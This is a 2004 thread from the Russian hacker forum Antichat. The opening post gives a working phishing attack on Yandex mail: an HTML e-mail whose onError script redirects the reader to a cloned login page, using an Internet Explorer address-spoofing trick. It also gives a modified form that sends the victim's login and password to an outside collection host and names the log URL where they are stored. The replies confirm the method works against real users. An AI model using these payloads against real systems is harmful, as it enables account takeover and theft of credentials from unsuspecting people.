ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.08.2004, 19:20
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Много спрашивают о взломе яндекс.ру. И почему-то все забывают о старинном методе с впариванием левой формы для авторизации. Такого материала было выпущено много, но как всегда порадовал своим долбо#$измом хакер.ру

Цитата из статьи журнала (за 2004-й г. кстати):</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
&quot;Ты никогда не думал, как хакеры могут выдирать пароли от почтовых ящиков? Как они получают к ним доступ? Задумывался ли ты о том, что хакеры могут выманить пароль у тебя самого, и при этом ты даже не заметишь, что что-то произошло? Нет? А такое вполне вероятно. Не веришь – читай дальше.&quot;
[/QUOTE]<span id='postcolor'>А дальше рассказывается о &quot;взломе&quot; путем просьбы о прохождении повторной регистрации (ссылка на копию главной страницы почтовика с поддельным ACTION). Не знаю, может кто-то ничего и не заметит)))

К сожалению почта яндекса на сегодняшний день как-то не особо ломается), поэтому придется пользоваться этим давно известным, &quot;незаметным&quot; способом. Расчитано на женщин, детей и стариков))
И все-таки мы не хакеры в отличае от тех &quot;околокомпьютерных журналистов&quot;, никаких писем от &quot;службы поддержки&quot; не будет(идиотизм, надо заметить). А будет редирект из почтового ящика.
Я нашел только один способ вставить скрипт в письмо, - это обработчик onError(onLoad уже прикрыли).
План действий.
Пишем письмо, и отправляем как обычно в HTML only на адрес злодея.
скрипт письма:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
Текст сообщения. Текст сообщения. Текст сообщения. Текст сообщения.
<img src=''onError="status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru%01@zhelezo.newmail.ru');" width=0 height=0>[/QUOTE]<span id='postcolor'>
Этот скрипт делает редирект на сайт http://zhelezo.newmail.ru, где лежит копия страницы http://passport.yandex.ru. Здесь мы используем баг IE с подменой УРЛ, то есть в адресной строке будет отображаться адрес яндекса.
На http://zhelezo.newmail.ru, в форме отправки пароля и логина мы произведем некоторые имзменения:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<Form action=http://zero.h12.ru/stat/capt.php?id=yandex method=GET target="invisible" onSubmit="status='http://passport.yandex.ru';location='http://yandex.ru';">
.........
.........
</form>
<iframe name=invisble width=0 height=0></iframe>[/QUOTE]<span id='postcolor'>
Во фрейм загрузим сниффер, который примет пароль и пасс, а onSubmit перенаправит нас на главную яндекса. Все. никаких премудростей с действительным заходом в почту, я думаю не нужно!

Перед редиректом можно че-нить замутить еще, к примеру алерт с надписью 503:Ошибка шлюза, или какой-нибудь Fatal error on Line xxx)) Это уже на вкус, в любом случае метод - для женщин детей и стариков)

Подытожу.
Шлем письмо:
&lt;img src=''onError=&quot;status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru%01@zhelezo.newmail.ru');&quot; width=0 height=0&gt;

Если юзер попался на уловку, - пароль будет лежать здесь:
http://zero.h12.ru/stat/log.php?id=yandex
 
Ответить с цитированием

  #2  
Старый 17.08.2004, 20:03
Аватар для ~Ice_night_BeTeP~
~Ice_night_BeTeP~
Участник форума
Регистрация: 14.08.2004
Сообщений: 118
Провел на форуме:
0

Репутация: 4
По умолчанию

Действеный спосбоб Джаз ! ПО моему прокатит !
 
Ответить с цитированием

  #3  
Старый 17.08.2004, 21:26
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Не такой уж и действенный, но лучше пока нет)
 
Ответить с цитированием

  #4  
Старый 18.08.2004, 07:41
Аватар для De1eT
De1eT
Постоянный
Регистрация: 12.08.2004
Сообщений: 447
Провел на форуме:
1210614

Репутация: 279
По умолчанию

Гм ) прокатывает на особо не умных юзерей
 
Ответить с цитированием

  #5  
Старый 19.08.2004, 20:22
Аватар для Thief
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

хороша статейка всё катит я пробывал спасибо за предложенный метод.
 
Ответить с цитированием

  #6  
Старый 23.08.2004, 14:05
Аватар для HoBu4ok
HoBu4ok
Познающий
Регистрация: 08.11.2002
Сообщений: 56
Провел на форуме:
50106

Репутация: 0
Отправить сообщение для HoBu4ok с помощью ICQ
По умолчанию

А чё yandex уже и onError прикрыл?
 
Ответить с цитированием

  #7  
Старый 23.08.2004, 21:18
Аватар для Флудер
Флудер
Познающий
Регистрация: 09.02.2004
Сообщений: 47
Провел на форуме:
2009

Репутация: 1
По умолчанию

JazzzSummerMan, ну, письмо от службы поддержки не такая уж и фигня... очень даже действенный метод между прочим
 
Ответить с цитированием

  #8  
Старый 24.08.2004, 09:33
Аватар для xBUGIx
xBUGIx
Познающий
Регистрация: 16.08.2004
Сообщений: 62
Провел на форуме:
0

Репутация: 1
По умолчанию

маленьких девочек ,не хорошо обманывать.вот..
 
Ответить с цитированием

  #9  
Старый 24.08.2004, 10:34
Аватар для HoBu4ok
HoBu4ok
Познающий
Регистрация: 08.11.2002
Сообщений: 56
Провел на форуме:
50106

Репутация: 0
Отправить сообщение для HoBu4ok с помощью ICQ
По умолчанию

Точно всё работает, только интересно, почему пароль и логин иногда не доходят?
 
Ответить с цитированием

  #10  
Старый 24.08.2004, 11:25
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Хостинг такой на holm.ru
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ